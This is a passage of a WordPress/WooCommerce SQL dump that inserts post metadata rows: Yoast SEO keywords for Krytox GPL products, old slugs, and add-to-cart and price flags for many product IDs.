INSERT INTO `wp_postmeta` VALUES (19486, 441, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 106'); 
INSERT INTO `wp_postmeta` VALUES (19487, 441, '_yoast_wpseo_focuskw', 'Krytox GPL 106'); 
INSERT INTO `wp_postmeta` VALUES (19488, 441, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19489, 441, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19490, 442, '_wp_old_slug', 'gpl-107'); 
INSERT INTO `wp_postmeta` VALUES (19491, 442, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (19492, 442, '_yoast_wpseo_focuskw_text_input', 'Krytox GPL 107'); 
INSERT INTO `wp_postmeta` VALUES (19493, 442, '_yoast_wpseo_focuskw', 'Krytox GPL 107'); 
INSERT INTO `wp_postmeta` VALUES (19494, 442, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (19495, 442, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (19496, 783, '_wp_old_slug', 'gpl-202'); 
INSERT INTO `wp_postmeta` VALUES (19497, 783, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19498, 784, '_wp_old_slug', 'gpl-203'); 
INSERT INTO `wp_postmeta` VALUES (19499, 784, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (19500, 788, '_wp_old_slug', 'gpl-204'); 
INSERT INTO `wp_postmeta` VALUES (19501, 788, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (19506, 346, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19507, 979, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19508, 1831, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19509, 182, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19510, 190, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19511, 290, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19512, 293, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19513, 297, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19514, 302, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19515, 303, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19516, 305, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19517, 306, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19518, 308, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19519, 310, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19520, 347, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19521, 400, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19522, 402, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19523, 410, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19524, 421, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19525, 419, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19526, 423, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19527, 425, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19528, 427, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19529, 436, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19530, 437, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19531, 438, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19532, 439, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19533, 440, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19534, 441, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19535, 442, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19536, 467, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19537, 468, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19538, 469, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19539, 473, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19540, 474, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19541, 489, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19542, 490, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19543, 568, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19544, 452, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19545, 575, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19546, 579, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19547, 580, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19548, 581, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19549, 582, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19550, 583, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19551, 577, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19552, 620, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19553, 621, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19554, 622, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19555, 623, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19556, 637, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19557, 638, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19558, 642, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19559, 643, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19560, 644, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19561, 645, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19562, 646, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19563, 647, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19564, 648, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19565, 649, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19566, 651, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19567, 652, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19568, 653, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19569, 654, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19570, 655, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19571, 656, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19572, 659, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19573, 671, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19574, 672, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19575, 674, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19576, 675, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19577, 696, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19578, 697, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19579, 707, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19580, 708, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19581, 713, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19582, 714, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19583, 715, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19584, 717, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19585, 732, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19586, 733, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19587, 734, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19588, 735, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19589, 736, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19590, 738, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19591, 769, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19592, 783, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19593, 784, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19594, 788, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19595, 789, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19596, 790, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19597, 814, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19598, 818, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19599, 819, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19601, 821, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19602, 822, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19603, 823, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19604, 824, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19605, 843, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19606, 844, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19607, 846, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19608, 847, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19609, 848, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19610, 850, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19611, 842, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19612, 852, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19613, 862, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19614, 861, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19615, 868, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19616, 878, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19617, 880, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19618, 877, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19619, 881, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19620, 882, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19621, 885, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19622, 887, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19623, 888, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19624, 891, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19625, 895, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19626, 900, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19627, 903, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19628, 910, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19629, 912, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19630, 918, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19631, 924, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19632, 937, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19633, 939, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19634, 943, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19635, 944, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19636, 941, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19637, 948, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19638, 954, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19639, 952, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19640, 956, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19641, 960, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19642, 955, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19643, 967, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19644, 968, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19645, 970, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19646, 977, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19647, 973, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19648, 984, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19649, 986, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19650, 989, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19651, 992, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19652, 993, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19653, 995, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19654, 996, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19655, 997, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19656, 998, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19657, 999, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19658, 1001, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19659, 994, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19660, 1002, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19661, 1009, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19662, 1010, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19663, 1011, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19664, 1012, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19665, 1014, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19666, 1015, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19667, 1016, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19668, 1019, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19669, 1031, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19670, 1033, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19671, 1035, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19672, 1042, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19673, 1059, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19674, 1061, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19675, 1063, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19676, 1065, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19677, 1067, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19678, 1069, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19679, 1072, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19680, 1077, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19681, 1088, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19682, 1097, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19683, 1100, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19684, 1102, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19685, 1104, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19686, 1106, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19687, 1111, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19688, 1149, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19689, 1152, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19690, 1164, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19691, 1166, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19692, 1168, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19693, 1178, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19694, 1181, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19695, 1183, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19696, 1185, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19697, 1187, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19698, 1189, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19699, 1191, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19700, 1193, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19701, 1198, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19702, 1209, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19703, 1212, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19704, 1216, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19705, 1221, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19706, 1224, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19707, 1227, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19708, 1230, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19709, 1263, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19710, 1268, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19711, 1270, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19712, 1276, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19713, 1278, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19714, 1287, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19715, 1292, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19716, 1338, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19717, 1344, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19718, 1384, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19719, 1428, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19720, 1431, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19721, 1435, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19722, 1637, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19723, 1638, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19724, 1643, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19725, 1644, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19726, 1645, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19727, 1646, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19728, 1647, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19729, 1648, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19730, 1649, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19731, 1662, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19732, 1664, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19733, 1666, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19734, 1668, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19735, 1670, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19736, 1673, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19737, 1677, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19738, 1679, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19739, 1681, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19740, 1683, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19741, 1690, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19742, 1693, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19743, 1695, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19744, 1697, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19745, 1705, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19746, 1706, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19747, 1707, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19748, 1708, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19749, 1710, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19750, 1711, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19751, 1712, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19752, 1713, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19753, 1719, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19754, 1722, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19755, 1724, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19756, 1726, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19757, 1729, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19758, 1801, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19759, 1819, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19760, 1836, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19761, 1840, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19762, 1834, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19763, 1851, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19764, 1852, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19765, 1866, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19766, 1868, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19767, 1865, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19779, 346, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19780, 979, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19781, 1831, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19782, 182, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19783, 190, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19784, 290, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19785, 293, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19786, 297, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19787, 302, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19788, 303, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19789, 305, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19790, 306, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19791, 308, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19792, 310, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19793, 347, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19794, 400, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19795, 402, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19796, 410, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19797, 421, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19798, 419, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19799, 423, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19800, 425, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19801, 427, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19802, 436, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19803, 437, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19804, 438, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19805, 439, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19806, 440, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19807, 441, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19808, 442, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19809, 467, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19810, 468, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19811, 469, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19812, 473, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19813, 474, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19814, 489, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19815, 490, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19816, 568, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19817, 452, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19818, 575, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19819, 579, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (19820, 580, '_enable_price', 'yes'); 
